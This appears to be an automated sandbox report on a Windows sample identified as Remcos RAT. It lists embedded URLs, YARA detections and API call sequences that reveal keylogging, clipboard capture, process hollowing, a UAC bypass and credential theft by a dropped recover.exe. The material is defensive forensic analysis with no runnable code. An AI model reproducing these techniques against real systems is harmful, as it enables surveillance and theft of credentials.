Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3959979865.00000000015BF000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3959979865.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3959979865.0000000001593000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000004.00000002.1530109872.0000000004759000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3959979865.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpp
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3959979865.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpy
Source: powershell.exe, 00000000.00000002.1520037336.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhvB707.tmp.9.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000000.00000002.1509922447.00000000049D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1509922447.0000000004881000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000004.00000002.1529434160.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1509922447.00000000049D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961571362.0000000004AB0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000B.00000002.1564678759.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961571362.0000000004AB0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000B.00000003.1564494587.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000B.00000003.1564444811.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000B.00000002.1564678759.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961571362.0000000004AB0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000B.00000002.1564678759.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: recover.exe, 0000000B.00000003.1564494587.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000B.00000003.1564444811.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.compData
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961571362.0000000004AB0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000B.00000002.1564678759.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: recover.exe, 00000009.00000002.1601521934.0000000000AC3000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: recover.exe, 0000000B.00000002.1564678759.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000000.00000002.1509922447.0000000004881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000000.00000002.1520037336.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1520037336.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1520037336.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1509922447.00000000049D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: recover.exe, 00000009.00000002.1602244527.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: recover.exe, 00000009.00000002.1603164636.0000000003309000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000009.00000003.1600982950.0000000003309000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfh
Source: recover.exe, 00000009.00000002.1602244527.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: recover.exe, 00000009.00000002.1602244527.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: recover.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000000.00000002.1520037336.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961571362.0000000004AB0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000B.00000002.1564678759.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: recover.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_00409D1E SetWindowsHookExA 0000000D,00409D0A,00000000

6_2_00409D1E

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,

6_2_0040B158

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0041696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	6_2_0041696E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	9_2_00409E39
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	9_2_00409EA1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	10_2_00406DFC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	10_2_00406E9F
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	11_2_004068B5
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	11_2_004072B5

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,

6_2_0040B158

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_00409E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

6_2_00409E4A

Source: Yara match	File source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1530109872.0000000004759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6904, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3959743316.0000000001558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1530109872.0000000004759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6904, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_0041CF2D SystemParametersInfoW,

6_2_0041CF2D

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000004.00000002.1530109872.0000000004759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6520, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6796, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6904, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

PE file contains section with special chars

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr

Static PE information: section name: iVN#X-

PE file has nameless sections

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr

Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00418267 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,GetLastError,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	6_2_00418267
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0041C077 OpenProcess,NtSuspendProcess,CloseHandle,	6_2_0041C077
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0041C0A3 OpenProcess,NtResumeProcess,CloseHandle,	6_2_0041C0A3
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_10006EF0 OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,	6_2_10006EF0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	9_2_0040BAE3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004016FD NtdllDefWindowProc_A,	10_2_004016FD
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004017B7 NtdllDefWindowProc_A,	10_2_004017B7
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00402CAC NtdllDefWindowProc_A,	11_2_00402CAC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00402D66 NtdllDefWindowProc_A,	11_2_00402D66

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_00416861 ExitWindowsEx,LoadLibraryA,GetProcAddress,

6_2_00416861

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 4_2_01489911	4_2_01489911
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 4_2_014811E0	4_2_014811E0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 4_2_01480848	4_2_01480848
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 4_2_014828D0	4_2_014828D0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 4_2_01480838	4_2_01480838
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 4_2_014828C0	4_2_014828C0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0042809D	6_2_0042809D
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0045412B	6_2_0045412B
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_004421C0	6_2_004421C0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_004281D7	6_2_004281D7
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0043E1E0	6_2_0043E1E0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0041E29B	6_2_0041E29B
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_004373DA	6_2_004373DA
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00438380	6_2_00438380
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00453472	6_2_00453472
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0042747E	6_2_0042747E
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0043E43D	6_2_0043E43D
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_004325A1	6_2_004325A1
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0043774C	6_2_0043774C
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0041F809	6_2_0041F809
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_004379F6	6_2_004379F6
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_004279F5	6_2_004279F5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0044DAD9	6_2_0044DAD9
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00433C73	6_2_00433C73
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00413CA0	6_2_00413CA0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00437CBD	6_2_00437CBD
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0043DD82	6_2_0043DD82
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00435F52	6_2_00435F52
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00437F78	6_2_00437F78
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0043DFB1	6_2_0043DFB1
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_04AEB5C1	6_2_04AEB5C1
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_04AF7194	6_2_04AF7194
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_100012CB	6_2_100012CB
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_1000F1CE	6_2_1000F1CE
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_10032287	6_2_10032287
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_1000F3FD	6_2_1000F3FD
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_1000B950	6_2_1000B950
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_10009AD0	6_2_10009AD0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_1001FAEB	6_2_1001FAEB
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_10013BD0	6_2_10013BD0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_10009D40	6_2_10009D40
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_10011D47	6_2_10011D47
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_1001BF19	6_2_1001BF19
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044A030	9_2_0044A030
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0040612B	9_2_0040612B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0043E13D	9_2_0043E13D
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044B188	9_2_0044B188
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00442273	9_2_00442273
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044D380	9_2_0044D380
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044A5F0	9_2_0044A5F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_004125F6	9_2_004125F6
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_004065BF	9_2_004065BF
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_004086CB	9_2_004086CB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_004066BC	9_2_004066BC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044D760	9_2_0044D760
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00405A40	9_2_00405A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00449A40	9_2_00449A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00405AB1	9_2_00405AB1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00405B22	9_2_00405B22
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044ABC0	9_2_0044ABC0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00405BB3	9_2_00405BB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00417C60	9_2_00417C60
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044CC70	9_2_0044CC70
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00418CC9	9_2_00418CC9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044CDFB	9_2_0044CDFB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044CDA0	9_2_0044CDA0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044AE20	9_2_0044AE20
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00415E3E	9_2_00415E3E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00437F3B	9_2_00437F3B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00405038	10_2_00405038
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0041208C	10_2_0041208C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004050A9	10_2_004050A9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0040511A	10_2_0040511A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0043C13A	10_2_0043C13A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004051AB	10_2_004051AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00449300	10_2_00449300
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0040D322	10_2_0040D322
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044A4F0	10_2_0044A4F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0043A5AB	10_2_0043A5AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00413631	10_2_00413631
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00446690	10_2_00446690
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044A730	10_2_0044A730
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004398D8	10_2_004398D8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004498E0	10_2_004498E0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044A886	10_2_0044A886
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0043DA09	10_2_0043DA09
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00438D5E	10_2_00438D5E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00449ED0	10_2_00449ED0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0041FE83	10_2_0041FE83
